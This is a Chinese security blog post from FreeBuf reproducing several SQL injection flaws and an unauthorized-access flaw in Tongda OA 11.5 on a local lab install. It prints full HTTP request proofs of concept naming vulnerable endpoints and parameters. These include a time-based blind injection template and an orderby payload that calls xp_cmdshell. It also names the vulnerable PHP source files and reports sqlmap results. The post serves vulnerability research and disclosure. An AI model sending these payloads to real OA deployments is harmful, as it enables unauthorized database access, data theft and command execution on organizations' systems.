freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

通达OA多枚SQL注入漏洞复现
2020-12-31 16:40:48

​通达OA多枚0day漏洞复现

刚刚群里发了一篇文章-研究复现一波,通达OA多枚0day漏洞poc出来了。

影响范围:通达OA11.5版本

v2-21100123623e27dd15b9589f02ad316b_b.png

一、环境搭建:

安装11.5版本


v2-e25f53bf7fab59e9ec1529405fc5de78_b.png

v2-80eafcb8dcdd868c40e35bc89fd705f8_b.png


v2-455c2b9a2cc234a4fc0a438a342b942e_b.png

安装完成:
v2-e73c86db4a2dfd1ab623978dd947be0c_b.png

服务器配置:
v2-4f2bb113f1687d2fed646f9f28ba1c39_b.png


v2-bce494a20c2be57db0842c9023591424_b.png

访问IP服务正常:
v2-978a6ce7801db65e7d606e3b72966070_b.png

成功登录系统:
v2-851383777c3ae881cd2cb013771de32e_b.png

二、漏洞验证复现

漏洞一:SQL注入 POC:

POST/general/appbuilder/web/calendar/calendarlist/getcallistHTTP/1.1
问题关键参数:starttime=12&endtime=15&view=month&condition=1
P
OST/general/appbuilder/web/calendar/calendarlist/getcallistHTTP/1.1Host: 192.168.0.107User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Connection: closeCookie: PHPSESSID=rsgpd6j2u0a2qsqbjilv1nln44; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=81d423f8Upgrade-Insecure-Requests: 1Content-Length: 152​starttime=12&endtime=15&view=month&condition=1

starttime=AND (SELECT[RANDNUM]FROM(SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])---&endtime=1598918400&view=month&condition=1

详细的注入参数点:


v2-9dca9a006b46d6adac4cb66dfcc92783_b.png

sqlmap验证:


v2-01478fae27026f8c6ff7d96beeca1b6a_b.png


漏洞文件:
webroot\general\appbuilder\modules\calendar\models\Calendar.php。
漏洞二:SQL注入 POC:
GET/general/email/sentbox/get_index_data.php?asc=0&boxid=&boxname=sentbox&curnum=3&emailtype=ALLMAIL&keyword=admint&orderby=execmasterxp_cmshell'ping127.0.0.1'--&pagelimit=20&tag=×tamp=1598069133&total=HTTP/1.1
问题关键参数:orderby
GET/general/email/sentbox/get_index_data.php?asc=0&boxid=&boxname=sentbox&curnum=3&emailtype=ALLMAIL&keyword=admint&orderby=execmasterxp_cmshell'ping127.0.0.1'--&pagelimit=20&tag=×tamp=1598069133&total=HTTP/1.1Host:192.168.0.107User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Connection: closeCookie: PHPSESSID=rsgpd6j2u0a2qsqbjilv1nln44; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=81d423f8Upgrade-Insecure-Requests: 1
手工注入闭合报错:

v2-6b3ad29c4e4cc8066e9c9048ef4554f1_b.png


burp参数查询,回现报错
sqlmap验证,(多次跑了一下)未验证成功。可以试试其他版本。
漏洞文件:webroot\inc\utility_email.php,get_sentbox_data函数接收传入参数未过滤,直接拼接在order by后面了造成注入。
漏洞三:SQL注入 POC:
GET/general/email/inbox/get_index_data.php?asc=0&boxid=&boxname=inbox&curnum=0&emailtype=ALLMAIL&keyword=&orderby=3--&pagelimit=10&tag=&timestamp=1598069103&total=HTTP/1.1
问题关键参数:orderby
GET/general/email/inbox/get_index_data.php?asc=0&boxid=&boxname=inbox&curnum=0&emailtype=ALLMAIL&keyword=&orderby=3--&pagelimit=10&tag=×tamp=1598069103&total=HTTP/1.1X-Requested-With: XMLHttpRequestReferer: http://192.168.43.169Cookie: PHPSESSID=54j5v894kbrm5sitdvv8nk4520; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=c9e143ffAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip,deflateHost: 192.168.43.169User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36Connection: close

手工注入闭合报错:


v2-df798ddca1acaee92a59f715125d08bb_b.png

burp参数查询,回现报错

sqlmap验证,(多次跑了一下)未验证成功。可以试试其他版本。
漏洞文件:webroot\inc\utility_email.php,get_email_data函数传入参数未过滤,直接拼接在order by后面了造成注入。
漏洞三和漏洞四,参数结果一样可能是这个影响,本地验证未成功。(个人复现情况)

开始看见sql注入2和sql注入3,我以为是是一样的,详细看了还是有差别,功能点参数相似。


v2-d18e71740267a3e3143fb9a472377ba7_b.png


漏洞四:SQL注入 POC:
GET/general/appbuilder/web/report/repdetail/edit?link_type=false&slot={}&id=2HTTP/1.1
问题关键参数:id
GET/general/appbuilder/web/report/repdetail/edit?link_type=false&slot={}&id=2HTTP/1.1X-Requested-With: XMLHttpRequestReferer: http://192.168.43.169Cookie: PHPSESSID=54j5v894kbrm5sitdvv8nk4520; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=c9e143ffAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip,deflateHost: 192.168.43.169User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36Connection: close

本地的数据库,相关信息不多


v2-4dcc59a3422ef9e1f3412e92a078d0a5_b.png

sqlmap验证:


v2-a352d37b1e97f8cd5f9769db2c105f45_b.png

漏洞文件:webroot\general\appbuilder\modules\report\controllers\RepdetailController.php,actionEdit函数中存在 一个$_GET["id"]; 未经过滤,拼接到SQL查询中,造成了SQL注入。

漏洞五:未授权访问:
http://127.0.0.1/general/calendar/arrange/get_cal_list.php?starttime=1595779200&endtime=1599408000&view=agendaDay

本地参数没有成功:可能是本地的环境是刚刚搭建,本地的时间没有相关的数据。


v2-112ad6a05818571dd7ad6b120a05923f_b.png


再次确认问题点:未授权访问各种会议通知信息,由于本地的环境是新的没有相关的,没有相关的会议消息,所以不能访问到数据。
参考文章:
安译Sec(https://mp.weixin.qq.com/s/3bI7v-hv4rMUnCIT0GLkJA)
免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
订阅查看更多复现文章、学习笔记
thelostworld

安全路上,与你并肩前行!!!!


v2-2fd29902f9e696422dbb34fe44673324_b.jpeg


个人知乎:https://www.zhihu.com/people/fu-wei-43-69/columns
个人简书:https://www.jianshu.com/u/bf0e38a8d400

个人CSDN:https://blog.csdn.net/qq_37602797/category_10169006.html


# 黑客 # 数据泄露 # 系统安全 # 数据安全 # 企业安全
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录